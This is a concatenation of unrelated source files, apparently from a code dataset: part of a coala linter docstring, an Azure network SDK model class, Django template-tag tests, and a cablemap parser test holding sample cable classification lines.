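    ...             if line.strip():
    ...                 yield Result.from_values(origin=self,
    ...                                          message=line.strip(),
    ...                                          file=filename)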
Documentation:
Bear description shall be provided at class level.
If you document your additional parameters inside ``create_arguments``,
``generate_config`` and ``process_output``, beware that conflicting
documentation between them may be overridden. Document duplicated
parameters inside ``create_arguments`` first, then in ``generate_config``
and after that inside ``process_output``.
For the tutorial see:
http://coala.readthedocs.org/en/latest/Users/Tutorials/Linter_Bears.html
:param executable:
The linter tool.
:param use_stdin:
Whether the input file is sent via stdin instead of passing it over the
command-line-interface.
:param use_stdout:
Whether to use the stdout output stream.
:param use_stderr:
Whether to use the stderr output stream.
:param config_suffix:
The suffix-string to append to the filename of the configuration file
created when ``generate_config`` is supplied. Useful if your executable
    expects a specific file type or file ending for the configuration
    file.
:param executable_check_fail_info:
Information that is provided together with the fail message from the
normal executable check. By default no additional info is printed.
:param prerequisite_check_command:
A custom command to check for when ``check_prerequisites`` gets
invoked (via ``subprocess.check_call()``). Must be an ``Iterable``.
:param prerequisite_check_fail_message:
A custom message that gets displayed when ``check_prerequisites``
fails while invoking ``prerequisite_check_command``. Can only be
provided together with ``prerequisite_check_command``.
:param output_format:
The output format of the underlying executable. Valid values are
- ``None``: Define your own format by overriding ``process_output``.
      Overriding ``process_output`` is then mandatory; not specifying it
      raises a ``ValueError``.
- ``'regex'``: Parse output using a regex. See parameter
``output_regex``.
    - ``'corrected'``: The output is the corrected version of the given file.
      Diffs are then generated to supply patches for results.
Passing something else raises a ``ValueError``.
:param output_regex:
The regex expression as a string that is used to parse the output
generated by the underlying executable. It should use as many of the
following named groups (via ``(?P<name>...)``) to provide a good
result:
- line - The line where the issue starts.
- column - The column where the issue starts.
- end_line - The line where the issue ends.
- end_column - The column where the issue ends.
- severity - The severity of the issue.
- message - The message of the result.
- origin - The origin of the issue.
- additional_info - Additional info provided by the issue.
    The groups ``line``, ``column``, ``end_line`` and ``end_column`` don't
    have to match numbers only; they can also match nothing, in which case
    the generated ``Result`` is automatically filled with ``None`` for the
    appropriate properties.
Needs to be provided if ``output_format`` is ``'regex'``.
:param severity_map:
A dict used to map a severity string (captured from the
``output_regex`` with the named group ``severity``) to an actual
``coalib.results.RESULT_SEVERITY`` for a result. Severity strings are
mapped **case-insensitive**!
- ``RESULT_SEVERITY.MAJOR``: Mapped by ``error``.
- ``RESULT_SEVERITY.NORMAL``: Mapped by ``warning`` or ``warn``.
- ``RESULT_SEVERITY.MINOR``: Mapped by ``info``.
A ``ValueError`` is raised when the named group ``severity`` is not
used inside ``output_regex`` and this parameter is given.
:param diff_severity:
The severity to use for all results if ``output_format`` is
``'corrected'``. By default this value is
``coalib.results.RESULT_SEVERITY.NORMAL``. The given value needs to be
defined inside ``coalib.results.RESULT_SEVERITY``.
:param result_message:
The message-string to use for all results. Can be used only together
with ``corrected`` or ``regex`` output format. When using
``corrected``, the default value is ``"Inconsistency found."``, while
for ``regex`` this static message is disabled and the message matched
by ``output_regex`` is used instead.
:param diff_distance:
Number of unchanged lines that are allowed in between two changed lines
so they get yielded as one diff if ``corrected`` output-format is
    given. If a negative distance is given, every change will be yielded as
    its own diff, even if they are right beneath each other. By default this
    value is ``1``.
:raises ValueError:
Raised when invalid options are supplied.
:raises TypeError:
Raised when incompatible types are supplied.
See parameter documentations for allowed types.
:return:
A ``LocalBear`` derivation that lints code using an external tool.
"""
options["executable"] = executable
options["output_format"] = output_format
options["use_stdin"] = use_stdin
options["use_stdout"] = use_stdout
options["use_stderr"] = use_stderr
options["config_suffix"] = config_suffix
options["executable_check_fail_info"] = executable_check_fail_info
options["prerequisite_check_command"] = prerequisite_check_command
_prepare_options(options)
return partial(_create_linter, options=options)
| agpl-3.0 | -2,417,693,380,399,300,600 | 42.814815 | 79 | 0.549544 | false |
lmazuel/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2017_03_01/models/topology_association.py | 1 | 1586 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class TopologyAssociation(Model):
"""Resources that have an association with the parent resource.
:param name: The name of the resource that is associated with the parent
resource.
:type name: str
:param resource_id: The ID of the resource that is associated with the
parent resource.
:type resource_id: str
:param association_type: The association type of the child resource to the
parent resource. Possible values include: 'Associated', 'Contains'
:type association_type: str or
~azure.mgmt.network.v2017_03_01.models.AssociationType
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'association_type': {'key': 'associationType', 'type': 'str'},
}
def __init__(self, **kwargs):
super(TopologyAssociation, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.resource_id = kwargs.get('resource_id', None)
self.association_type = kwargs.get('association_type', None)
| mit | -3,703,639,473,381,361,700 | 38.65 | 78 | 0.612863 | false |
ychab/mymoney | mymoney/core/tests/test_templatetags.py | 1 | 12142 | import unittest
from decimal import Decimal
from unittest import mock
from django.test import SimpleTestCase
from django.urls import reverse
from django.utils.safestring import SafeText
from django_webtest import WebTest
from mymoney.apps.bankaccounts.factories import BankAccountFactory
from mymoney.apps.banktransactions.factories import BankTransactionFactory
from mymoney.apps.banktransactions.models import BankTransaction
from ..factories import UserFactory
from ..templatetags.core_tags import (
breadcrumb, currency_positive, display_messages, form_errors_exists,
language_to_upper, localize_positive, localize_positive_color,
merge_form_errors, payment_method,
)
class TemplateTagsTestCase(unittest.TestCase):
def test_display_messages(self):
msgs = [
mock.Mock(tags='success'),
mock.Mock(tags='error'),
mock.Mock(tags='debug'),
mock.Mock(tags=None),
]
context = display_messages(msgs)
i = 0
for msg in context['messages']:
if i == 0:
self.assertEqual(msg.type, 'success')
elif i == 1:
self.assertEqual(msg.type, 'danger')
elif i == 2:
self.assertEqual(msg.type, 'info')
else:
self.assertIsNone(msg.type)
i += 1
def test_payment_method(self):
context = payment_method(BankTransaction.PAYMENT_METHOD_CREDIT_CARD)
self.assertIsNotNone(context)
context = payment_method(BankTransaction.PAYMENT_METHOD_CASH)
self.assertIsNotNone(context)
context = payment_method(BankTransaction.PAYMENT_METHOD_TRANSFER)
self.assertIsNotNone(context)
context = payment_method(BankTransaction.PAYMENT_METHOD_TRANSFER_INTERNAL)
self.assertIsNotNone(context)
context = payment_method(BankTransaction.PAYMENT_METHOD_CHECK)
self.assertIsNotNone(context)
def test_breadcrumb(self):
bankaccount = BankAccountFactory()
kwargs = {
"bankaccount_pk": bankaccount.pk,
}
request = mock.Mock(path=reverse('banktransactions:create', kwargs=kwargs))
context = breadcrumb(request)
self.assertListEqual(
[reverse('banktransactions:list', kwargs=kwargs)],
[link['href'] for link in context['links']]
)
banktransaction = BankTransactionFactory(bankaccount=bankaccount)
request = mock.Mock(path=reverse('banktransactions:update', kwargs={
'pk': banktransaction.pk,
}))
context = breadcrumb(request, banktransaction.bankaccount.pk)
self.assertListEqual(
[reverse('banktransactions:list', kwargs=kwargs)],
[link['href'] for link in context['links']]
)
request = mock.Mock(path=reverse('banktransactionschedulers:create', kwargs=kwargs))
context = breadcrumb(request)
self.assertListEqual(
[
reverse('banktransactions:list', kwargs=kwargs),
reverse('banktransactionschedulers:list', kwargs=kwargs),
],
[link['href'] for link in context['links']]
)
banktransaction = BankTransactionFactory(bankaccount=bankaccount)
request = mock.Mock(path=reverse('banktransactionschedulers:update', kwargs={
'pk': banktransaction.pk,
}))
context = breadcrumb(request, banktransaction.bankaccount.pk)
self.assertListEqual(
[
reverse('banktransactions:list', kwargs=kwargs),
reverse('banktransactionschedulers:list', kwargs=kwargs),
],
[link['href'] for link in context['links']]
)
class TemplateTagsWebTestCase(WebTest):
@classmethod
def setUpTestData(cls):
cls.owner = UserFactory(username='owner')
cls.superowner = UserFactory(username='superowner', user_permissions='admin')
cls.bankaccount = BankAccountFactory(owners=[cls.owner, cls.superowner])
def test_menu_action_links(self):
url = reverse('bankaccounts:list')
href = reverse('bankaccounts:create')
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
url = reverse('banktransactiontags:list')
href = reverse('banktransactiontags:create')
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
url = reverse('banktransactions:list', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
href = reverse('banktransactions:create', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
href = reverse('bankaccounts:delete', kwargs={
'pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
url = reverse('banktransactions:calendar', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
href = reverse('banktransactions:create', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
href = reverse('bankaccounts:delete', kwargs={
'pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
url = reverse('banktransactionschedulers:list', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
href = reverse('banktransactionschedulers:create', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
def test_menu_tab_links(self):
url = reverse('banktransactions:list', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
href = reverse('bankaccounts:update', kwargs={
'pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
def test_menu_item_links(self):
url = reverse('banktransactionanalytics:ratio', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
href = reverse('banktransactionanalytics:trendtime', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
href = reverse('banktransactionanalytics:ratio', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
response.click(href=href, index=1)
url = reverse('banktransactions:list', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
href = reverse('banktransactions:calendar', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
href = reverse('banktransactions:list', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
response.click(href=href, index=1)
class TemplateFiltersWebTestCase(unittest.TestCase):
def test_merge_form_errors(self):
form = mock.Mock(
non_field_errors=mock.Mock(return_value=[]),
visible_fields=mock.Mock(return_value=[]),
)
self.assertListEqual(merge_form_errors(form), [])
form = mock.Mock(
non_field_errors=mock.Mock(return_value=["foo", "bar"]),
visible_fields=mock.Mock(return_value=[]),
)
self.assertListEqual(merge_form_errors(form), ["foo", "bar"])
form = mock.Mock(
non_field_errors=mock.Mock(return_value=[]),
visible_fields=mock.Mock(
return_value=[
mock.Mock(errors=["baz", "alpha"]),
]
),
)
self.assertListEqual(merge_form_errors(form), ["baz", "alpha"])
form = mock.Mock(
non_field_errors=mock.Mock(return_value=["foo", "bar"]),
visible_fields=mock.Mock(
return_value=[
mock.Mock(errors=["baz", "alpha"]),
mock.Mock(errors=["beta"]),
mock.Mock(errors=[]),
]
),
)
self.assertListEqual(
merge_form_errors(form),
["foo", "bar", "baz", "alpha", "beta"]
)
def test_form_errors_exists(self):
form = mock.Mock(
non_field_errors=mock.Mock(
return_value=mock.Mock(
as_data=mock.Mock(
return_value=[
mock.Mock(code='foo'),
mock.Mock(code='bar'),
]
)
)
)
)
self.assertTrue(form_errors_exists(form, 'bar'))
self.assertFalse(form_errors_exists(form, 'baz'))
class TemplateFiltersTestCase(SimpleTestCase):
def test_language_to_upper(self):
self.assertEqual(language_to_upper('en-us'), 'en-US')
self.assertEqual(language_to_upper('fr-fr'), 'fr-FR')
self.assertEqual(language_to_upper('fr'), 'fr')
def test_currency_positive(self):
with self.settings(LANGUAGE_CODE='en-us'):
self.assertEqual(
currency_positive(Decimal('1547.23'), 'USD'),
"+$1,547.23",
)
with self.settings(LANGUAGE_CODE='fr-fr'):
self.assertEqual(
currency_positive(Decimal('1547.23'), 'EUR'),
'+1\xa0547,23\xa0€',
)
def test_localize_positive(self):
with self.settings(LANGUAGE_CODE='en-us'):
self.assertEqual(
localize_positive(Decimal('15.23')),
'+15.23',
)
with self.settings(LANGUAGE_CODE='fr-fr'):
self.assertEqual(
localize_positive(Decimal('15.23')),
'+15,23',
)
def test_localize_positive_color(self):
with self.settings(LANGUAGE_CODE='en-us'):
s = localize_positive_color(Decimal('15.23'))
self.assertIsInstance(s, SafeText)
self.assertEqual(s, '<p class="text-success">+15.23</p>')
s = localize_positive_color(Decimal('-15.23'))
self.assertIsInstance(s, SafeText)
self.assertEqual(s, '<p class="text-danger">-15.23</p>')
with self.settings(LANGUAGE_CODE='fr-fr'):
s = localize_positive_color(Decimal('15.23'))
self.assertIsInstance(s, SafeText)
self.assertEqual(s, '<p class="text-success">+15,23</p>')
s = localize_positive_color(Decimal('-15.23'))
self.assertIsInstance(s, SafeText)
self.assertEqual(s, '<p class="text-danger">-15,23</p>')
| bsd-3-clause | 8,614,120,296,105,935,000 | 34.086705 | 92 | 0.584596 | false |
heuer/cablemap | cablemap.core/tests/test_reader_classified_by.py | 1 | 39464 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2011 - 2015 -- Lars Heuer <heuer[at]semagia.com>
# All rights reserved.
#
# License: BSD, see LICENSE.txt for more details.
#
"""\
Tests classificationist parsing.
:author: Lars Heuer (heuer[at]semagia.com)
:organization: Semagia - <http://www.semagia.com/>
:license: BSD license
"""
from nose.tools import eq_, ok_
from cablemap.core import cable_by_id
from cablemap.core.reader import parse_classified_by
_TEST_DATA = (
(u'10TOKYO397', u'Marc Wall', u'''FIELD
REF: STATE 015541
Classified By: Acting Deputy Chief of Mission Marc Wall for Reasons 1.4
(b) and (d)
¶1. (C) SUM'''),
(u'10GENEVA249', u'Rose E. Gottemoeller', u'''REF: 10 GENEVA 231 (SFO-GVA-VIII-088) CLASSIFIED BY: Rose E. Gottemoeller, Assistant Secretary, Department of State, VCI; REASON: 1.4(B), (D) '''),
(u'10GENEVA247', u'Rose E. Gottemoeller', u'''REF: 10 GENEVA 245 (SFO-GVA-VIII-086) CLASSIFIED BY: Rose E. Gottemoeller, Assistant Secretary, Department of State, VCI; REASON: 1.4(B), (D) ¶1. (U) This '''),
(u'10UNVIEVIENNA77', u'Glyn T. Davies', u'''\nClassified By: Ambassador Glyn T. Davies for reasons 1.4 b and d '''),
(u'10WARSAW117', u'F. Daniel Sainz', u'''\nClassified By: Political Counselor F. Daniel Sainz for Reasons 1.4 (b) and (d) '''),
(u'10STATE16019', u'Karin L. Look', u'''\nClassified By: Karin L. Look, Acting ASSISTANT SECRETARY, VCI. Reason: 1.4 (b) and (d).'''),
(u'10LILONGWE59', u'Bodde Peter', u'''\nCLASSIFIED BY: Bodde Peter, Ambassador; REASON: 1.4(B) '''),
(u'95ZAGREB4339', u'ROBERT P. FINN', u'''
1. (U) CLASSIFIED BY ROBERT P. FINN, DEPUTY CHIEF OF
MISSION. REASON: 1.5 (D)
'''),
(u'95DAMASCUS5748', u'CHRISTOPHER W.S. ROSS', u'''SUBJECT: HAFIZ AL-ASAD: LAST DEFENDER OF ARABS
1. CONFIDENTIAL - ENTIRE TEXT. CLASSIFIED BY:
CHRISTOPHER W.S. ROSS, AMBASSADOR. REASON: 1.5 (D) .
2. SUMMAR'''),
(u'95TELAVIV17504', (), u'''
1. CONFIDENTIAL - ENTIRE TEXT. CLASSIFIED BY SECTION 1.5 (B)
AND (D). NIACT PRECEDENCE BECAUSE OF GOVERNMENT CRISIS IN
ISRAEL.
2. SU'''),
(u'95RIYADH5221', u'THEODORE KATTOUF', u'''
1. CONFIDENTIAL - ENTIRE TEXT. CLASSIFIED BY DCM
THEODORE KATTOUF - 1.5 B,D.
2. (C)'''),
(u'96ADDISABABA1545', u'JEFFREY JACOBS', u'''
1. (U) CLASSIFIED BY POLOFF JEFFREY JACOBS, 1.5 (D).
2. (C)'''),
(u'96AMMAN2094', u'ROBERT BEECROFT', u'''
1. (U) CLASSIFIED BY CHARGE ROBERT BEECROFT; REASON 1.5 (D).
2. (C) '''),
(u'96STATE86789', u'MARY BETH LEONARD', u'''
1. CLASSIFIED BY AF/C - MARY BETH LEONARD, REASON 1.5
(D). '''),
(u'96NAIROBI6573', u'TIMOTHY CARNEY', u'''
1. CLASSIFIED BY AMBASSADOR TO SUDAN TIMOTHY CARNEY.
REASON 1.5(D).
'''),
(u'96RIYADH2406', u'THEODORE KATTOUF', u'''SUBJECT: CROWN PRINCE ABDULLAH THE DIPLOMAT
1. (U) CLASSIFIED BY CDA THEODORE KATTOUF, REASON 1.5.D.
2. '''),
(u'96RIYADH2696', u'THEODORE KATTOUF', u'''
1. (U) CLASSIFIED BY CHARGE D'AFFAIRES THEODORE
KATTOUF: 1.5 B, D.
'''),
(u'96ISLAMABAD5972', u'THOMAS W. SIMONS, JR.', u'''
1. (U) CLASSIFIED BY THOMAS W. SIMONS, JR., AMBASSADOR.
REASON: 1.5 (B), (C) AND (D).
'''),
(u'96ISLAMABAD5972', u'Thomas W. Simons, Jr.', u'''
1. (U) CLASSIFIED BY THOMAS W. SIMONS, JR., AMBASSADOR.
REASON: 1.5 (B), (C) AND (D).
''', True),
(u'96STATE183372', u'LEE 0. COLDREN', u'''
1. (U) CLASSIFIED BY LEE 0. COLDREN, DIRECTOR, SA/PAB,
DEPARTMENT OF STATE. REASON: 1.5(D).
'''),
(u'96STATE183372', u'Lee O. Coldren', u'''
1. (U) CLASSIFIED BY LEE 0. COLDREN, DIRECTOR, SA/PAB,
DEPARTMENT OF STATE. REASON: 1.5(D).
''', True),
(u'96ASHGABAT2612', u'TATIANA C. GFOELLER', u'''
1. (U) CLASSIFIED BY CHARGE TATIANA C. GFOELLER.
REASON: 1.5 D.
'''),
(u'96BOGOTA8773', u'S.K. ABEYTA', u'''
1. CLASSIFIED BY POL/ECONOFF. S.K. ABEYTA. REASON: 1.5(D)
'''),
(u'96STATE194868', u'E. GIBSON LANPHER, JR.', u'''
1. (U) CLASSIFIED BY E. GIBSON LANPHER, JR., ACTING
ASSISTANT SECRETARY OF STATE FOR SOUTH ASIAN AFFAIRS,
DEPARTMENT OF STATE. REASON: 1.5(D).
'''),
(u'96JAKARTA7841', u'ED MCWILLIAMS', u'''
1. (U) CLASSIFIED BY POL COUNSELOR ED MCWILLIAMS;
REASON 1.5(D)
'''),
(u'96JERUSALEM3094', u'EDWARD G. ABINGTON, JR.', u'''
1. CLASSIFIED BY CONSUL GENERAL EDWARD G. ABINGTON, JR. REASON
1.5 (B) AND (D).
'''),
(u'96BOGOTA10967', u'S.K. ABEYTA', u'''
1. (U) CLASSIFIED BY POL/ECONOFF S.K. ABEYTA. REASON 1.5(D).
'''),
(u'04MUSCAT2112', u'Richard L. Baltimore, III', u'''
Classified By: Ambassador Richard L. Baltimore, III.
Reasons: 1.4 (b) and (d).
'''),
(u'04MUSCAT2112', u'Richard L. Baltimore, III', u'''
Classified By: Ambassador Richard L. Baltimore, III.
Reasons: 1.4 (b) and (d).
''', True),
(u'05OTTAWA1975', u'Patricia Kim-Scott', u'''
Classified By: Pol/Mil Officer Patricia Kim-Scott. Reason E.O. 12958,
1.4 (b) and (d).
'''),
(u'05BOGOTA6208', u'William B. Wood', u'''
Classified By: Ambassador William B. Wood; reasons 1.4
(b) and (d)
'''),
(u'05TAIPEI2839', u'Douglas Paal', u'''
Classified By: AIT Director Douglas Paal, Reason(s): 1.4 (B/D).
'''),
(u'05DHAKA3073', u'D.C. McCullough', u'''
Classified By: A/DCM D.C. McCullough, reason para 1.4 (b)
'''),
(u'09NAIROBI1132', u'Jessica Davis Ba', u'''
Classified By: Pol/Econ Officer Jessica Davis Ba for reasons 1.4(b) and
(d)
'''),
(u'08ROME1541', u'Liz Dibble', u'''
Classified By: Classified by DCM Liz Dibble for reasons 1.4 (b) and
(d).
'''),
(u'06BAGHDAD2082', u'DANIEL SPECKHARD', ur'''
Classified By: CHARGE D\'AFFAIRES DANIEL SPECKHARD FOR REASONS 1.4 (A),
(B) AND (D)
'''),
(u'05ANKARA4653', u'Nancy McEldowney', u'''
Classified By: (U) CDA Nancy McEldowney; E.O. 12958, reasons 1.4 (b,d)
'''),
(u'05QUITO2057', u'LARRY L. MEMMOTT', u'''
Classified By: ECON LARRY L. MEMMOTT, REASONS 1.4 (B,D)
'''),
(u'06HONGKONG3559', u'LAURENT CHARBONNET', u'''
CLASSIFIED BY: ACTING DEPUTY PRINCIPAL OFFICER LAURENT CHARBONNET. REA
SONS: 1.4 (B,D)
'''),
(u'09BAGHDAD791', u'Patricia Butenis', u'''
Classified By: Charge d\' Affairs Patricia Butenis for reasons 1.4 (b) a
nd (d)
'''),
(u'06OSLO19', u'Christopher W. Webster', u'''
Classified By: Charge d\'Affaires a.i. Christopher W. Webster,
reason 1.4 (b) and (d)
'''),
(u'08BEIJING3386', u'Aubrey Carlson', u'''
Classified By: Political Section Minister Counselor Aubrey Carlson. Re
asons 1.4 (b/d).
'''),
(u'09MOSCOW2393', u'Susan M. Elliott', u'''
Classified By: Political Minister Counselor Susan M. Elliott for reason
s: 1.4 (b), (d).
'''),
(u'10BRUSSELS66', u'Christopher R. Davis', u'''
Classified By: Political Minister-Counselor Christopher R. Davis for re
ason 1.4 (b/d)
'''),
(u'06BEIJING22125', u'ROBERT LUKE', u'''
Classified By: (C) CLASSIFIED BY MINISTER COUNSELOR FOR ECONOMIC AFFAIR
S ROBERT LUKE; REASON 1.4 (B) AND (D).
'''),
(u'07CAIRO622', u'William R. Stewart', u'''
Classified by: Minister Counselor for Economic and
Political Affairs William R. Stewart for reasons 1.4(b) and
(d).
'''),
(u'07BAGHDAD1188', u'Daniel Speckhard', u'''
Classified By: Charge Affaires Daniel Speckhard. Reasons: 1.4 (b) and
(d).
'''),
(u'08PARIS1131', u'STUART DWYER', u'''
Classified By: ECONCOUNS STUART DWYER FOR REASONS 1.4 B AND D
'''),
(u'08ATHENS985', u'Jeff Hovenier', u'''
Classified By: A/Political Counselor Jeff Hovenier for
1.4 (b) and (d)
'''),
(u'09BEIJING2690', u'William Weinstein', u'''
Classified By: This message classified by Econ Minister Counselor
William Weinstein for reasons 1.4 (b), (d) and (e).
'''),
(u'06VILNIUS945', u'Rebecca Dunham', u'''
Classified By: Political and Economic Section Chief Rebecca Dunham for
reasons 1.4 (b) and (d)
'''),
(u'07BAGHDAD2781', u'Howard Keegan', u'''
Classified By: Kirkuk PRT Team Leader Howard Keegan for reason 1.4 (b)
and(d).
'''),
(u'09HARARE864', u'Donald Petterson', u'''
Classified By: Charge d\'affaires, a.i. Donald Petterson for reason 1.4
(b).
'''),
(u'04MANAMA525', u'Robert S. Ford', u'''
Classified By: Charge de Affaires Robert S. Ford for reasons
1.4 (b) and (d).
'''),
(u'08STATE56778', u'Patricia A. McNerney', u'''
Classified By: ISN Acting Assistant Secretary
Patricia A. McNerney, Reasons 1.4 b, c, and d
'''),
(u'07BRUSSELS1462', u'Larry Wohlers', u'''
Classified By: USEU Political Minister Counselor Larry Wohlers
for reasons 1.4 (b) and (d).
'''),
(u'09KABUL2261', u'Hoyt Yee', u'''
Classified By: Interagency Provincial Affairs Deputy Coordinator Hoyt Y
ee for reasons 1.4 (b) and (d)
'''),
(u'09KABUL1233', u'Patricia A McNerney', u'''
Classified By: PRT and Sub-National Governance Acting Director Patricia
A McNerney for reasons 1.4 (b) and (d)
'''),
(u'09BRUSSELS1288', u'CHRISTOPHER DAVIS', u'''
Classified By: CLASSIFIED BY USEU MCOUNSELOR CHRISTOPHER DAVIS, FOR REA
SONS 1.4 (B) AND (D)
'''),
(u'06TAIPEI3165', u'Stephen M. Young', u'''
Classified By: Classified by AIT DIR Stephen M. Young.
Reasons: 1.4 b, d.
'''),
(u'07BRUSSELS1208', u'Courtney Nemroff', u'''
Classified By: Institutional Affairs Unit Chief Courtney Nemroff for re
asons 1.4 (b) & (d)
'''),
(u'05CAIRO8602', u'Michael Corbin', u'''
Classified by ECPO Minister-Counselour Michael Corbin for
reasons 1.4 (b) and (d).
'''),
(u'09MADRID1210', u'Arnold A. Chacon', u'''
Classified By: Charge d'Affaires, a.i., Arnold A. Chacon
1.(C) Summary: In his meetings with Spanish officials,
Special Envoy for Eurasian Energy'''),
(u'05SINGAPORE887', u'Laurent Charbonnet', u'''
Classified By: E/P Counselor Laurent Charbonnet, Reasons 1.4(b)(d)
'''),
(u'09SINGAPORE677', u'Dan Jassem', u'''
Classified By: Acting E/P Counselor Dan Jassem for reasons 1.4 (b) and
(d)
'''),
(u'08BELGRADE1189', u'Thatcher Scharpf', u'''
Classified By: Acting Deputy Chief of Mission Thatcher Scharpf for reas
ons 1.4(b/d).
'''),
(u'09BAGHDAD3319', u'Rachna Korhonen', u'''
Classified By: PRT Kirkuk Governance Section Head Rachna Korhonen for r
easons 1.4 (b) and (d).
'''),
(u'04ANKARA5897', u'Thomas Goldberger', u'''
Classified By: (U) Classified by Economic Counselor Thomas Goldberger f
or reasons 1.4 b,d.
'''),
(u'00HARARE3759', u'TOM MCDONALD', u'''
CLASSIFIED BY AMBASSADOR TOM MCDONALD.
CONFIDENTIAL
PAGE 02 HARARE 03759 01 OF 03 111533Z
REASONS: 1.5 (B) AND (D).
1. (C) SUMMARY: ALTHOUGH WIDESPREAD FEARS OF A
SPIKE'''),
(u'07STATE156455', u'Glyn T. Davies', u'''
Classified By: Glyn T. Davies
SUMMARY
-------
'''),
(u'03GUATEMALA1727', u'Erik Hall', u'''
Classified By: Labor Attache Erik Hall. Reason 1.5 (d).
'''),
(u'05VILNIUS503', u'LARRY BEISEL', u'''
Classified By: DEFENSE ATTACHE LTC LARRY BEISEL FOR REASONS 1.4 (B) AND
(D).
'''),
(u'08USUNNEWYORK729', u'Carolyn L. Willson', u'''
Classified By: USUN Legal Adviser Carolyn L. Willson, for reasons
1.4(b) and (d)
'''),
(u'04BRUSSELS4688', u'Jeremy Brenner', u'''
Classified By: USEU polmil officer Jeremy Brenner for reasons 1.4 (b) a
nd (d)
'''),
(u'08GUATEMALA1416', u'Drew G. Blakeney', u'''
Classified By: Pol/Econ Couns Drew G. Blakeney for reasons 1.4 (b&d).
'''),
(u'08STATE77798', u'Brian H. Hook', u'''
Classified By: IO Acting A/S Brian H. Hook, E.O. 12958,
Reasons: 1.4(b) and (d)
'''),
(u'05ANKARA1071', u'Margaret H. Nardi', u'''
Classified By: Acting Counselor for Political-Military Affiars Margaret
H. Nardi for reasons 1.4 (b) and (d).
'''),
(u'08MOSCOW3655', u'David Kostelancik', u'''
Classified By: Deputy Political M/C David Kostelancik. Reasons 1.4 (b)
and (d).
'''),
(u'09STATE75025', u'Richard C. Holbrooke', u'''
Classified By: Special Representative for Afghanistan and Pakistan
Richard C. Holbrooke
1. (U) This is an action request; see paragraph 4.
'''),
(u'10KABUL688', u'Joseph Mussomeli', u'''
Classified By: Assistant Chief of Mission Joseph Mussomeli for Reasons
1.4 (b) and (d)
'''),
(u'98USUNNEWYORK1638', u'HOWARD STOFFER', u'''
CLASSIFIED BY DEPUTY POLITICAL COUNSEL0R HOWARD STOFFER
PER 1.5 (B) AND (D). ACTION REQUEST IN PARA 10 BELOW.
'''),
(u'02ROME3119', u'PIERRE-RICHARD PROSPER', u'''
CLASSIFIED BY: AMBASSADOR-AT-LARGE PIERRE-RICHARD PROSPER
FOR REASONS 1.5 (B) AND (D)
'''),
(u'02ANKARA8447', u'Greta C. Holtz', u'''
Classified by Consul Greta C. Holtz for reasons 1.5 (b) & (d).
'''),
(u'09USUNNEWYORK282', u'SUSAN RICE', u'''
Classified By: U.S. PERMANENT REPRESENATIVE AMBASSADOR SUSAN RICE
FOR REASONS 1.4 B/D
'''),
(u'09DHAKA339', u'Geeta Pasi', u'''
Classified By: Charge d'Affaires, a.i. Geeta Pasi. Reasons 1.4 (b) and
(d)
'''),
(u'06USUNNEWYORK2273', u'Alejandro D. Wolff', u'''
Classified By: Acting Permanent Representative Alejandro D. Wolff
per reasons 1.4 (b) and (d)
'''),
(u'08ISLAMABAD1494', u'Anne W. Patterson', u'''
Classified By: Ambassador Anne W. Patterson for reaons 1.4 (b) and (d).
1. (C) Summary: During'''),
(u'08BERLIN1150', u'Robert Pollard', u'''
Classified By: Classified by Economic Minister-Counsellor
Robert Pollard for reasons 1.4 (b) and (d)
'''),
(u'08STATE104902', u'DAVID WELCH', u'''
Classified By: 1. CLASSIFIED BY NEA ASSISTANT SECRETARY DAVID WELCH
REASONS: 1.4 (B) AND (D)
'''),
(u'07VIENTIANE454', u'Mary Grace McGeehan', u'''
Classified By: Charge de'Affairs ai. Mary Grace McGeehan for reasons 1.
4 (b) and (d)
'''),
(u'07ROME1948', u'William Meara', u'''
Classified By: Acting Ecmin William Meara for reasons 1.4 (b) and (d)
'''),
(u'07USUNNEWYORK545', u'Jackie Sanders', u'''
Classified By: Amb. Jackie Sanders. E.O 12958. Reasons 1.4 (B&D).
'''),
(u'06USOSCE113', u'Bruce Connuck', u'''
Classified By: Classified by Political Counselor Bruce Connuck for Reas
(b) and (d).
'''),
(u'09DOHA404', u'Joseph LeBaron', u'''
